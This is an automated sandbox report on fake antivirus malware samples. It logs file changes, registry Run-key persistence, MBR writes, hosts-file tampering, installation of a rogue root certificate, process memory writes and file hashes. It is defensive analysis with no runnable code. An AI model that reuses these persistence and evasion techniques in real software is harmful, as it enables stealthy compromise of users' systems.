File opened for modification C:\Windows\SystemApps\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Assets\Wide310x150Logo.contrast-white_scale-100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemResources\Windows.UI.Shell\Images\LocationIcon.contrast-black_scale-100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemResources\Windows.UI.ShellCommon\Images\RibbonToast.scale-150.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\ImmersiveControlPanel\images\wide.Globe.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\Assets\SquareTile150x150.scale-100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\Icons\SmallTile.scale-200.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\ImmersiveControlPanel\images\Gaming.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\header\Images\dockV.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorUWPSquare44x44Logo.targetsize-30_altform-unplated.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\Icons\contrast-white\MediumTile.scale-125.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\ScreenClipping\ScreenClipping\Assets\Square44x44Logo.targetsize-24_altform-unplated.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemResources\Windows.UI.Search\Images\logo.contrast-white_scale-100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Assets\Square44x44Logo.targetsize-30_altform-unplated.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorUWPStoreLogo.scale-100_contrast-white.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\ParentalControls_cw5n1h2txyewy\Assets\Splashscreen.scale-100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemResources\Windows.UI.Shell\Images\PasswordExpiry.contrast-black_scale-100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\Assets\StoreLogo.scale-150.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemResources\Windows.UI.ShellCommon\Images\DefaultSystemNotification.contrast-white_scale-400.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\Web\Screen\img101.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Assets\PeopleLogo.scale-125_contrast-white.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\Icons\contrast-white\WideTile.scale-200.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy\Assets\SquareTile44x44.scale-200.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\ImmersiveControlPanel\images\wide.Apps.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemResources\Windows.UI.Search\Images\logo.contrast-white.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Images\topGradRepeat.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemResources\Windows.UI.ShellCommon\Images\WiFiNetworkManagerWarningToast.scale-400_contrast-white.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Ratings\RatingStars49.contrast-black_scale-200.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Assets\Square71x71Logo.contrast-white_scale-200.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\Assets\SquareLogo71x71.scale-400.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Assets\Square44x44Logo.targetsize-48_altform-lightunplated.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\header\Images\headerrestore.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Assets\StoreLogo.scale-100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\Web\Screen\img104.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Assets\PasswordExpiry.contrast-white_scale-200.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorUWPSquare150x150Logo.scale-400_contrast-white.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemResources\Windows.UI.Search\Images\logo.contrast-black_scale-100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemResources\Windows.UI.ShellCommon\Images\WiFiNetworkManagerWarningToast.scale-100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\ImmersiveControlPanel\images\logo.scale-100.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\ImmersiveControlPanel\images\TileSmall.scale-125.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\perftools\images\i_appevent.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Assets\PeopleLogo.targetsize-30_altform-unplated_contrast-black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\Assets\StoreLogo.scale-200.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\diffIcon.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\debugger\images\stepOver.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\dom\images\i_error.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\Icons\AppListIcon.targetsize-32_altform-unplated.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\SplashScreen.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\InputApp\Assets\SplashScreen.scale-400.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemResources\Windows.UI.ShellCommon\Images\CellularToast.scale-200_contrast-black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Assets\PeopleLogo.targetsize-96_altform-unplated_contrast-black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\memoryAnalyzer\images\i_info.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe"

C:\Users\Admin\AppData\Local\Temp\is-CB1BD.tmp\is-MLOMF.tmp

"C:\Users\Admin\AppData\Local\Temp\is-CB1BD.tmp\is-MLOMF.tmp" /SL4 $301CA "C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe" 232353 52224

C:\Program Files (x86)\FileFix Professional 2009\wizard.exe

"C:\Program Files (x86)\FileFix Professional 2009\wizard.exe"

Network

Country Destination Domain Proto
US 20.231.121.79:80 tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 filefixpro.com udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

memory/4356-0-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-CB1BD.tmp\is-MLOMF.tmp

MD5 0360b1d1195775766b2e78a7b463f658
SHA1 8e4b2b1b6d1e4446c979b0cea7db6db7eee21610
SHA256 bee86b674d51b4e21822e44f9408a69d60e282e39f5897888df334c74d840aa4
SHA512 23103b4457952091848f171f5c20351dd55ce1bce209da21c1b6792d6e0b13476a104698c31ad744df2df39408110d73f84b61e627bbb6d1d2a461db4370597d

memory/3536-6-0x00000000007B0000-0x00000000007B1000-memory.dmp

memory/4356-12-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3536-13-0x0000000000400000-0x00000000004B1000-memory.dmp

memory/3536-16-0x00000000007B0000-0x00000000007B1000-memory.dmp

C:\Program Files (x86)\FileFix Professional 2009\wizard.exe

MD5 e1827fbbf959d7c5f3219a1f0b0c35fc
SHA1 677d7c6179729fdb4a25afdd5579533f1606c810
SHA256 c28ac5f267bec7650ce271c12b23f087f9c3927a46b48682e363581fa29e2a5d
SHA512 a65dc0550f9d1501add93390501027d83002c2df0df22bbf5d88dce9c98b6ebb4a2c297010e44cfebfaa8b7ba0f77ed12c2d13fb9b213e15c4b53dfd56ead0c3

memory/3536-37-0x0000000000400000-0x00000000004B1000-memory.dmp

memory/3536-44-0x0000000000400000-0x00000000004B1000-memory.dmp

memory/4356-45-0x0000000000400000-0x0000000000413000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

33s

Max time network

36s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe"

Signatures

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Zwcd = "C:\\Windows\\SysWOW64\\KBDKORC.exe" C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Windows\SysWOW64\KBDKORC.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\{56321-2157-3235-3211} = "C:\\Users\\Admin\\AppData\\Roaming\\RtlDriver32.exe" C:\Users\Admin\AppData\Local\Temp\AV.EXE N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\physicaldrive0 C:\Users\Admin\AppData\Local\Temp\SB.EXE N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\KBDKORC.exe C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A
File opened for modification C:\Windows\SysWOW64\KBDKORC.exe C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A

Enumerates physical storage devices

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30530A0C86EDB1CD5A2A5FE37EF3BF28E69BE16D C:\Users\Admin\AppData\Local\Temp\AV.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30530A0C86EDB1CD5A2A5FE37EF3BF28E69BE16D\Blob = 03000000010000001400000030530a0c86edb1cd5a2a5fe37ef3bf28e69be16d2000000001000000b3020000308202af308202180209009168978ee53f5964300d06092a864886f70d010105050030819b310b30090603550406130255533110300e06035504081307566972676e69613110300e060355040713074e65776275727931123010060355040a13094261636f72204c4c43312330210603550403131a746f74616c736f6c7574696f6e616e746976697275732e636f6d312f302d06092a864886f70d010901162061646d696e40746f74616c736f6c7574696f6e616e746976697275732e636f6d301e170d3131303931383131313834395a170d3132303931373131313834395a30819b310b30090603550406130255533110300e06035504081307566972676e69613110300e060355040713074e65776275727931123010060355040a13094261636f72204c4c43312330210603550403131a746f74616c736f6c7574696f6e616e746976697275732e636f6d312f302d06092a864886f70d010901162061646d696e40746f74616c736f6c7574696f6e616e746976697275732e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100cac8419346518527133fdefd7982ac3919f1d6e2f815ecab0b5d219ccf843885645cfd9c35cae2eff8e7506e690b52c587a59c8d667cb671454030bd370fa334b18afb5ea4f4f819a36685a705a8543f320af913ca680a1d32a402db6d3e42d93228e44ba230fda524d490ddc35b922f23d36d95417136ac50afa567e21359350203010001300d06092a864886f70d0101050500038181003c6a7f43ca2cee1caafee88b04777032a4c9d7794222537e3ebe57953198281bdbe0d3a58f7d3eb358f361848f30ad88a364cd0ae3376e6239dedb01497d52d3dd55e78e49375373419ad7e5e2e036f713bf4d96a552f2aa26b35b66d7a83fb2a9b6e317d162d8342f09ccc71b2a1c7d9474ca7872bfa4acd623d61c4491d740 C:\Users\Admin\AppData\Local\Temp\AV.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SB.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV.EXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\RtlDriver32.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV.EXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\RtlDriver32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\KBDKORC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2244 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV.EXE
PID 2244 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV.EXE
PID 2244 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV.EXE
PID 2244 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV.EXE
PID 2244 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV2.EXE
PID 2244 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV2.EXE
PID 2244 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV2.EXE
PID 2244 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV2.EXE
PID 2244 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\DB.EXE
PID 2244 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\DB.EXE
PID 2244 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\DB.EXE
PID 2244 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\DB.EXE
PID 2244 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\EN.EXE
PID 2244 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\EN.EXE
PID 2244 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\EN.EXE
PID 2244 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\EN.EXE
PID 2244 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\SB.EXE
PID 2244 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\SB.EXE
PID 2244 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\SB.EXE
PID 2244 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\SB.EXE
PID 1280 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE C:\Windows\SysWOW64\KBDKORC.exe
PID 1280 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE C:\Windows\SysWOW64\KBDKORC.exe
PID 1280 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE C:\Windows\SysWOW64\KBDKORC.exe
PID 1280 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE C:\Windows\SysWOW64\KBDKORC.exe
PID 1968 wrote to memory of 1616 N/A C:\Windows\SysWOW64\KBDKORC.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1968 wrote to memory of 1616 N/A C:\Windows\SysWOW64\KBDKORC.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1968 wrote to memory of 1616 N/A C:\Windows\SysWOW64\KBDKORC.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1968 wrote to memory of 1616 N/A C:\Windows\SysWOW64\KBDKORC.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1280 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE C:\Windows\SysWOW64\cmd.exe
PID 1280 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE C:\Windows\SysWOW64\cmd.exe
PID 1280 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE C:\Windows\SysWOW64\cmd.exe
PID 1280 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE C:\Windows\SysWOW64\cmd.exe
PID 2716 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE C:\ProgramData\mC17766EgLmO17766\mC17766EgLmO17766.exe
PID 2716 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE C:\ProgramData\mC17766EgLmO17766\mC17766EgLmO17766.exe
PID 2716 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE C:\ProgramData\mC17766EgLmO17766\mC17766EgLmO17766.exe
PID 2716 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE C:\ProgramData\mC17766EgLmO17766\mC17766EgLmO17766.exe
PID 2352 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\AV.EXE C:\Users\Admin\AppData\Roaming\RtlDriver32.exe
PID 2352 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\AV.EXE C:\Users\Admin\AppData\Roaming\RtlDriver32.exe
PID 2352 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\AV.EXE C:\Users\Admin\AppData\Roaming\RtlDriver32.exe
PID 2352 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\AV.EXE C:\Users\Admin\AppData\Roaming\RtlDriver32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe"

C:\Users\Admin\AppData\Local\Temp\AV.EXE

"C:\Users\Admin\AppData\Local\Temp\AV.EXE"

C:\Users\Admin\AppData\Local\Temp\AV2.EXE

"C:\Users\Admin\AppData\Local\Temp\AV2.EXE"

